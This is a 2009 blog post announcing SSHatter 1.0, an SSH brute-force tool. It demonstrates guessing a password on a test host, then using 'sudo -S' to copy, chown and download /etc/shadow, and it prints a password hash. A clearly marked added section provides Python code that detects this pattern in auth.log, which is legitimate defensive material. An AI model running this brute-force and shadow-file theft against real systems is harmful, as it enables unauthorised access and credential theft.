2009-12-10 02:02:25

By Tim Brown

Well, it's taken a while (lots of other interesting stuff to keep me busy) but I'm pleased to announce that SSHatter 1.0 is almost ready for release. I tagged a private 0.9 release last night and, assuming no major bugs are identified, I'd expect that 1.0 will be released over the weekend. So what can you look forward to in SSHatter 1.0? Well, I've taken a long hard look at what other tools exist (notably keimpx by one of my colleagues, which aims to take the pain out of large Windows networks). The upshot is that SSHatter 1.0 has been rebuilt for exploitation. Take a look at the session below, which should give you some idea of what to expect:

$ ./SSHatter.pl -x 5 -t testdata/t -u testdata/u -p testdata/p
I: 10.31.33.7:22
I: 10.31.33.7:22 finished
y:y@10.31.33.7:22

As you can see, I enumerated just one host (10.31.33.7) and found one user "y" with a password of "y". Now that's where the old SSHatter would stop, but hold on a minute, SSHatter 1.0 has a bunch of features for post brute force exploration:

$ ./SSHatter.pl -x 5 -t testdata/t -u testdata/u -p testdata/p -0 -s -i
I: 10.31.33.7:22
I: 10.31.33.7:22 finished
y:y@10.31.33.7:22
W: executing in interactive mode, continue? [y/N] y
$ id
[y:y@10.31.33.7:22]$ id
uid=1002(y) gid=1003(y) groups=1003(y)
$ sudo -S -l
[y:y@10.31.33.7:22]$ sudo -S -l
Matching Defaults entries for y on this host:
    env_reset

User y may run the following commands on this host:
    (ALL) ALL
$ sudo -S cp /etc/shadow shadow
[y:y@10.31.33.7:22]$ sudo -S cp /etc/shadow shadow
$ sudo -S chown y shadow
[y:y@10.31.33.7:22]$ sudo -S chown y shadow
$ get shadow
[y:y@10.31.33.7:22]$ cat shadow
$ exit

As you can see, I reran SSHatter with the -i flag, which tells it that I want to use it in interactive mode. I was able to confirm my id and then make a call to sudo. Later versions of this popular access control tool have the -S flag, which tells it to take the password from standard input and not from the pseudo terminal. This, combined with the -0 flag, allows us to pass our newly discovered password through and execute commands as root. As you can see, I use this feature to take a copy of /etc/shadow and, once I have changed its ownership, I issue the get command to download it:

$ cat y@10.31.33.7:22-shadow | grep y
y:$8$ko3ACbLg$sI2Nq02nmGDPxSqJ9UA3zxTDOp5oNTSCKmAlDtbawyfc8NbR8qXmmVGHeHn2183UWrY0Ie8wlO/yf2dhiXHPP/:14554:0:99999:7:::

Sure enough, I now have a copy of the shadow file on my local system.
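From the defending side, the session above leaves a very recognisable trail in the SSH daemon and sudo logs: a burst of "Failed password" entries from one source, an "Accepted password" from the same source, and then sudo invocations with no controlling terminal (sudo logs TTY=unknown when a command is run without a pty, which is what a non-interactive exec over SSH looks like) that touch /etc/shadow. The following is an added example, not part of the original post or of SSHatter, that runs that detection logic over a constructed sample of auth.log lines; the log lines, host name, addresses and the threshold of three failures are all assumptions made for the illustration.

```python
import re
from collections import defaultdict

# Constructed sample of /var/log/auth.log lines (not taken from the original post).
SAMPLE_LOG = """\
Dec 10 02:00:01 host sshd[4101]: Failed password for invalid user admin from 10.31.33.9 port 51022 ssh2
Dec 10 02:00:02 host sshd[4103]: Failed password for x from 10.31.33.9 port 51023 ssh2
Dec 10 02:00:02 host sshd[4105]: Failed password for y from 10.31.33.9 port 51024 ssh2
Dec 10 02:00:03 host sshd[4107]: Failed password for y from 10.31.33.9 port 51025 ssh2
Dec 10 02:00:03 host sshd[4109]: Failed password for y from 10.31.33.9 port 51026 ssh2
Dec 10 02:00:04 host sshd[4111]: Accepted password for y from 10.31.33.9 port 51027 ssh2
Dec 10 02:00:05 host sudo:        y : TTY=unknown ; PWD=/home/y ; USER=root ; COMMAND=/bin/cp /etc/shadow shadow
Dec 10 02:00:06 host sudo:        y : TTY=unknown ; PWD=/home/y ; USER=root ; COMMAND=/bin/chown y shadow
Dec 10 02:10:00 host sshd[4200]: Accepted publickey for alice from 10.31.33.50 port 40000 ssh2
Dec 10 02:11:00 host sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt-get update
"""

# OpenSSH authentication outcome: "Failed password for [invalid user] NAME from IP port N ssh2"
SSH_RE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) (\S+) for (?:invalid user )?(\S+) from (\S+) port"
)
# sudo's default syslog line: "sudo: USER : TTY=... ; PWD=... ; USER=root ; COMMAND=..."
SUDO_RE = re.compile(
    r"sudo:\s+(\S+) : TTY=(\S+) ; PWD=\S+ ; USER=(\S+) ; COMMAND=(.*)$"
)
# Files whose appearance in a sudo command line deserves a second look.
SENSITIVE = ("/etc/shadow", "/etc/sudoers", "/etc/passwd")


def analyse(log_text, threshold=3):
    """Return brute-force sources, password logins that followed a failure burst,
    and sudo commands from those accounts run without a tty or touching SENSITIVE."""
    failures = defaultdict(int)   # source ip -> count of failed password attempts
    compromised = []              # (user, ip) accepted by password after >= threshold failures
    sudo_events = []              # (user, tty, command) for every sudo invocation

    for line in log_text.splitlines():
        m = SSH_RE.search(line)
        if m:
            outcome, method, user, ip = m.groups()
            if outcome == "Failed":
                failures[ip] += 1
            elif method == "password" and failures[ip] >= threshold:
                compromised.append((user, ip))
            continue
        m = SUDO_RE.search(line)
        if m:
            user, tty, _target, command = m.groups()
            sudo_events.append((user, tty, command))

    flagged_users = {user for user, _ in compromised}
    suspicious_sudo = [
        (user, cmd)
        for user, tty, cmd in sudo_events
        if user in flagged_users
        and (tty == "unknown" or any(path in cmd for path in SENSITIVE))
    ]
    return {
        "brute_force": sorted((ip, n) for ip, n in failures.items() if n >= threshold),
        "compromised": compromised,
        "suspicious_sudo": suspicious_sudo,
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The sudo check is deliberately scoped to accounts that logged in by password after a failure burst, so alice's key-based login and normal apt-get run are not reported even though she also used sudo; the same correlation is what keeps the rule from paging on every legitimate non-interactive sudo in a cron job.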

Mood: Pleased

Music: No Use For A Name
